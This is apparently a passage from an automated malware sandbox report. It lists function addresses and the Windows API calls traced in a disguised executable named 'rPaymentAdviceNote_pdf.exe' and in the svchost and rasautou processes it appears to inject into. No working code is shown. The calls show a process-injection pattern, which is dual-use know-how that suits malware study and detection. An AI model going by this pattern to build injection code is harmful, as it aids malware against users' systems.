                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872BF0 NtAllocateVirtualMemory,8_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872AB0 NtWaitForSingleObject,8_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872AD0 NtReadFile,8_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872AF0 NtWriteFile,8_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872F90 NtProtectVirtualMemory,8_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872FA0 NtQuerySection,8_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872FB0 NtResumeThread,8_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872FE0 NtCreateFile,8_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872F30 NtCreateSection,8_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872F60 NtCreateProcessEx,8_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872E80 NtReadVirtualMemory,8_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872EA0 NtAdjustPrivilegesToken,8_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872EE0 NtQueueApcThread,8_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872E30 NtWriteVirtualMemory,8_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872DB0 NtEnumerateKey,8_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872DD0 NtDelayExecution,8_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872D00 NtSetInformationFile,8_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872D10 NtMapViewOfSection,8_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872D30 NtUnmapViewOfSection,8_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872CA0 NtQueryInformationToken,8_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872CC0 NtQueryVirtualMemory,8_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872CF0 NtOpenProcess,8_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872C00 NtQueryInformationProcess,8_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872C60 NtCreateKey,8_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873090 NtSetValueKey,8_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873010 NtOpenDirectoryObject,8_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038739B0 NtGetContextThread,8_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873D10 NtOpenProcessToken,8_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873D70 NtOpenThread,8_2_03873D70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04994650 NtSuspendThread,LdrInitializeThunk,11_2_04994650
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04994340 NtSetContextThread,LdrInitializeThunk,11_2_04994340
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04992CA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04992C70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992C60 NtCreateKey,LdrInitializeThunk,11_2_04992C60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992DD0 NtDelayExecution,LdrInitializeThunk,11_2_04992DD0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04992DF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04992D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04992D30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04992E80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04992EE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992FB0 NtResumeThread,LdrInitializeThunk,11_2_04992FB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992FE0 NtCreateFile,LdrInitializeThunk,11_2_04992FE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992F30 NtCreateSection,LdrInitializeThunk,11_2_04992F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992AD0 NtReadFile,LdrInitializeThunk,11_2_04992AD0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992AF0 NtWriteFile,LdrInitializeThunk,11_2_04992AF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04992BA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04992BF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04992BE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992B60 NtClose,LdrInitializeThunk,11_2_04992B60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049935C0 NtCreateMutant,LdrInitializeThunk,11_2_049935C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049939B0 NtGetContextThread,LdrInitializeThunk,11_2_049939B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992CC0 NtQueryVirtualMemory,11_2_04992CC0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992CF0 NtOpenProcess,11_2_04992CF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992C00 NtQueryInformationProcess,11_2_04992C00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992DB0 NtEnumerateKey,11_2_04992DB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992D00 NtSetInformationFile,11_2_04992D00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992EA0 NtAdjustPrivilegesToken,11_2_04992EA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992E30 NtWriteVirtualMemory,11_2_04992E30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992F90 NtProtectVirtualMemory,11_2_04992F90
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992FA0 NtQuerySection,11_2_04992FA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992F60 NtCreateProcessEx,11_2_04992F60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992AB0 NtWaitForSingleObject,11_2_04992AB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992B80 NtQueryInformationFile,11_2_04992B80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993090 NtSetValueKey,11_2_04993090
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993010 NtOpenDirectoryObject,11_2_04993010
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993D10 NtOpenProcessToken,11_2_04993D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993D70 NtOpenThread,11_2_04993D70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69A60 NtDeleteFile,11_2_02A69A60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69B00 NtClose,11_2_02A69B00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69800 NtCreateFile,11_2_02A69800
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69970 NtReadFile,11_2_02A69970
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69C60 NtAllocateVirtualMemory,11_2_02A69C60
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_008AA1EF
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00898310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00898310
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008A51BD
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0084E6A00_2_0084E6A0
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086D9750_2_0086D975
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0084FCE00_2_0084FCE0
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008621C50_2_008621C5
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008762D20_2_008762D2
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C03DA0_2_008C03DA
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0087242E0_2_0087242E
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008625FA0_2_008625FA
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008566E10_2_008566E1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0089E6160_2_0089E616
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0087878F0_2_0087878F
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A88890_2_008A8889
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008588080_2_00858808
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008768440_2_00876844
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C08570_2_008C0857
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086CB210_2_0086CB21
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00876DB60_2_00876DB6
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00856F9E0_2_00856F9E
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008530300_2_00853030
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008631870_2_00863187
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086F1D90_2_0086F1D9
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008412870_2_00841287
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008614840_2_00861484
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008555200_2_00855520
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008676960_2_00867696
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008557600_2_00855760
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008619780_2_00861978
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00879AB50_2_00879AB5
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00861D900_2_00861D90
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086BDA60_2_0086BDA6
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C7DDB0_2_008C7DDB
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00853FE00_2_00853FE0
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0084DF000_2_0084DF00
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_016565800_2_01656580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00418C938_2_00418C93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004030608_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004010E08_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004022C08_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004022BA8_2_004022BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004013B08_2_004013B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042F4238_2_0042F423
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004024288_2_00402428
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004024308_2_00402430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004104A38_2_004104A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004106C38_2_004106C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004026F68_2_004026F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416E8F8_2_00416E8F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416E938_2_00416E93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E7438_2_0040E743
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004027008_2_00402700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E3F08_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039003E68_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FA3528_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C02C08_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E02748_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F41A28_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039001AA8_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F81CC8_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038301008_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA1188_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C81588_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D20008_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383C7C08_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038647508_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038407708_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385C6E08_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039005918_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038405358_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EE4F68_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E44208_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F24468_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F6BD78_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FAB408_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA808_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A08_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390A9A68_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038569628_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038268B88_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E8F08_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384A8408_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038428408_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BEFA08_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832FC88_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384CFE08_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03882F288_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03860F308_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E2F308_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B4F408_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03852E908_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FCE938_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FEEDB8_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FEE268_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840E598_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03858DBF8_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383ADE08_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384AD008_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DCD1F8_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0CB58_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830CF28_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840C008_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0388739A8_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F132D8_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382D34C8_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038452A08_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385B2C08_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E12ED8_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384B1B08_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387516C8_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382F1728_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390B16B8_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EF0CC8_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038470C08_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F70E98_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FF0E08_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FF7B08_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F16CC8_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038856308_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DD5B08_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039095C38_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F75718_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FF43F8_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038314608_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385FB808_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B5BF08_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387DBF98_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FFB768_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DDAAC8_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03885AA08_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E1AA38_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EDAC68_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FFA498_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F7A468_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B3A6C8_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D59108_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038499508_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385B9508_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038438E08_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038AD8008_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03841F928_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FFFB18_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FFF098_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03849EB08_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385FDC08_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03843D408_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F1D5A8_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F7D738_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FFCF28_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B9C328_2_038B9C32
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_04359D3510_2_04359D35
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0436050510_2_04360505
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0436050110_2_04360501
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_04357DB510_2_04357DB5
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_04378A9510_2_04378A95
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_04359B1510_2_04359B15
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0436230510_2_04362305
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A0E4F611_2_04A0E4F6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A0442011_2_04A04420
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1244611_2_04A12446
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A2059111_2_04A20591
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496053511_2_04960535
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0497C6E011_2_0497C6E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0495C7C011_2_0495C7C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0498475011_2_04984750
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496077011_2_04960770
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049F200011_2_049F2000
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A141A211_2_04A141A2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A201AA11_2_04A201AA
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A181CC11_2_04A181CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049FA11811_2_049FA118
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0495010011_2_04950100
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049E815811_2_049E8158
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049E02C011_2_049E02C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A0027411_2_04A00274
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A203E611_2_04A203E6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496E3F011_2_0496E3F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1A35211_2_04A1A352
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A00CB511_2_04A00CB5
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04950CF211_2_04950CF2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04960C0011_2_04960C00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04978DBF11_2_04978DBF
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0495ADE011_2_0495ADE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049FCD1F11_2_049FCD1F
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04972E9011_2_04972E90
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1CE9311_2_04A1CE93
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1EEDB11_2_04A1EEDB
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1EE2611_2_04A1EE26
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04960E5911_2_04960E59
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049DEFA011_2_049DEFA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04952FC811_2_04952FC8
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496CFE011_2_0496CFE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A02F3011_2_04A02F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04980F3011_2_04980F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049A2F2811_2_049A2F28
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049D4F4011_2_049D4F40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049468B811_2_049468B8
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0498E8F011_2_0498E8F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496284011_2_04962840
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496A84011_2_0496A840
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A2A9A611_2_04A2A9A6
